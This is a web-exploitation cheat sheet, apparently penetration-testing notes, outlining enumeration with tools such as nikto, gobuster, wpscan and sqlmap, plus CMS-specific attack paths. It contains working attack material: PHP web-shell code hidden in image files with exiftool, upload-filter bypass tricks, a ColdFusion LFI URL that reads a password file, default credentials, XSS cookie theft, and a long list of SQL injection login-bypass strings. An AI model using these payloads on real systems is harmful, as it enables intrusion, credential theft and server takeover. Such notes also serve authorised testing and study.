Web Exploitation


  • Check it out web browser

  • What does it display

  • Read entire pages

    • look for emails, names, user info - Enum the interface, what version of CMS, server installation page etc. - What does the potential vulnerability in it?

    • LFI, RFI, Directory traversal, SQL Injection, XML External Entities, OS Command Injection, Upload vulnerability

  • Default web server page which reveals version information?

  • Use Web Application Scanner (Refer note)

    • Example, nikto

      • nikto -h –output filename

  • Google for exploit

    • Rapid7

    • SearchSploit

  • If https

    • scan for heartbleed

      • sslscan

      • nmap -sV --script=ssl-heartbleed

    • Read the certificate

      • Does it include names that might be useful? - Correct vhost

  • View the source code

    • Hidden Values

    • Developer Remarks

    • Extraneous Code

    • Passwords!

  • Use curl

    • curl <ip address / dns>

    • curl -I <url>

  • View robots.txt

  • Brute forcing HTTP(s) directories and files

  • Tools

    • dirb

    • dirbuster

    • nikto

    • wfuzz

    • gobuster for quick directory search

  • Brute force directory recursively

    • If you found a directory example /admin, bruteforce more deeply

    • dirb

  • Looking for .git

  • Set extension

    • sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar

  • Bruteforce subdomain

  • Creating wordlist from webpage

    • cewl

  • Redirecting webpage automatically?

    • noredirect plugin

  • If it's a login page

    • Try view source code

    • Use default password

    • Brute force directory first (sometime you don't need to login to pwn the machine)

    • using curl

    • bruteforce credential

      • Burpsuite

        • sniper. clusterbomb

      • Wfuzz

        • wfuzz -w pass.txt -L 20 -d "username=FUZZ&password=FUZZ" -hw 1224 http://login page path

      • Search credential in other service port

        • tftp

        • ftp

    • Enumeration for the credential

    • Search credential by bruteforce directory

    • Register first

    • SQL injection

      • SQLMap

    • XSS can be used to get the admin cookie

    • Bruteforce session cookie

  • If it's a CMS

    • Google their vulnerability

      • Wordpress, Drupal, Joomla. Vtiger, etc.

    • Go to admin page

      • Joomla

        • /administrator

          • Wordpress

        • /wp-admin

        • /wp-login

    • Wordpress

      • wpscan -u --enumerate -t --enumerate u --enumerate p

      • Bruteforce login page

        • wpscan –u ipaddress --username name --wordlist pathtolist

      • Random agent

      • wpscan -u http://cybear32c.lab/ --random-agent

      • Zoom.py

        • enumerate wordpress users

    • Drupal

      • droopsescan https://github.com/droope/droopescan

      • /CHANGELOG.txt to find version

    • Adobe Cold Fusion

      • Metasploit - Determine version

      • /CFIDE/adminapi/base.cfc?wsdl

      • Version 8 Vulnerabilit

      • Fckeditor

      • use exploit/windows/http/coldfusion_fckeditor

      • LFI

        • http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

    • Elastix

      • Google the vulnerabitlities

      • default login are admin:admin at /vtigercrm/

      • able to upload shell in profile-photo

      • Examine configuration files - Generic

      • Examine httpd.conf/ windows config files

    • JBoss

      • JMX Console http://IP:8080/jmxconcole/

      • War File

    • Joomla

      • configuration.php

      • diagnostics.php

      • joomla.inc.php

      • config.inc.php

    • Mambo

      • configuration.php

      • config.inc.php

    • Wordpress

      • setup-config.php

      • wp-config.php

    • ZyXel

      • /WAN.html (contains PPPoE ISP password)

      • /WLAN_General.html and /WLAN.html (contains WEP key)

      • /rpDyDNS.html (contains DDNS credentials

      • /Firewall_DefPolicy.html (Firewall)

      • /CF_Keyword.html (Content Filter)

      • /RemMagWWW.html (Remote MGMT)

      • /rpSysAdmin.html (System)

      • /LAN_IP.html (LAN)

      • /NAT_General.html (NAT)

      • /ViewLog.html (Logs)

      • /rpFWUpload.html (Tools

      • /DiagGeneral.html (Diagnostic)

      • /RemMagSNMP.html (SNMP Passwords)

      • /LAN_ClientList.html (Current DHCP Leases)

      • Config Backups

        • /RestoreCfg.html

        • /BackupCfg.html

  • Upload page

    • Upload shell to make reverse shell

    • Bypass file upload filtering

    • Rename it

      • upload it as shell.php.jpg

    • Blacklisting bypass, change extension

      • php phtml, .php, .php3, .php4, .php5, and .inc

      • bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6

      • asp asp, .aspx

      • perl .pl, .pm, .cgi, .lib

      • jsp .jsp, .jspx, .jsw, .jsv, and .jspf

      • Coldfusion .cfm, .cfml, .cfc, .dbm

  • Whitelisting bypass

    • passed by uploading a file with some type of tricks,

    • Like adding a null byte injection like ( shell.php%00.gif ).

    • Or by using double extensions for the uploaded file like ( shell.jpg.php)

    • GIF89a;

    • If they check the content. Basically you just add the text "GIF89a;" before you shell-code.

      <? system($_GET['cmd']);//or you can insert your complete shellcode ?>

    • In image

      • manipulate data

      • exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg

      • rename it

        • mv lo.jpg lo.php.jpg

  • Phpmyadmin

    • Default password root:pma

  • Webmin

    • Have vulnerabilities, google.

  • Identify WAF using wafw00f

  • Spidering a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers

  • WMAP Web Scanner

    • web application vulnerability scanner


  • Heartbleed exploit

    use auxiliary/scanner/ssl/openssl_heartbleed
    set RHOSTS
    set verbose true
  • XXS

    • Session hijacking / Cookie theft. Steal cookie to get admin privilege

    • use xsser tool

  • Local File Inclusion

  • SQL Injection

    • Enum using nmap

      • nmap -sV --script=http-sql-injection <target>

    • Using jsql

    • Using sqlmap with login-page

    • Capture the request using burp suite, and save the request in a file.

    • sqlmap -r request.txt

    • Crawl a page to find sql-injections

      • sqlmap -u http://example.com --crawl=1

    • Login bypass

      • ‘or 1=1- -

      • ‘ or ‘1’=1

      • ‘ or ‘1’=1 - -

      • ‘–

      • ' or '1'='1

      • -'

      • ' '

      • '&'

      • '^'

      • '*'

      • ' or ''-'

      • ' or '' '

      • ' or ''&'

      • `' or ''^'``

      • `' or ''*'

      • "-"

      • " "

      • "&"

      • "^"

      • "*"

      • " or ""-"

      • " or "" "

      • " or ""&"

      • " or ""^"

      • " or ""*"

      • or true--

      • " or true--

      • ' or true--

      • ") or true--

      • ') or true--

      • ' or 'x'='x

      • ') or ('x')=('x

      • ')) or (('x'))=(('x

      • " or "x"="x

      • ") or ("x")=("x

      • ")) or (("x"))=(("x

      • known Username

        • admin’ - -

        • admin’) - -

    • Using error-bases DB enumeration

      • Add the tick '

      • Enumerate columns

  • XML External Entity (XXE)

  • URL vulnerability

  • OS command Injection

  • Directory traversal

  • Dotdotpwn tool

Last updated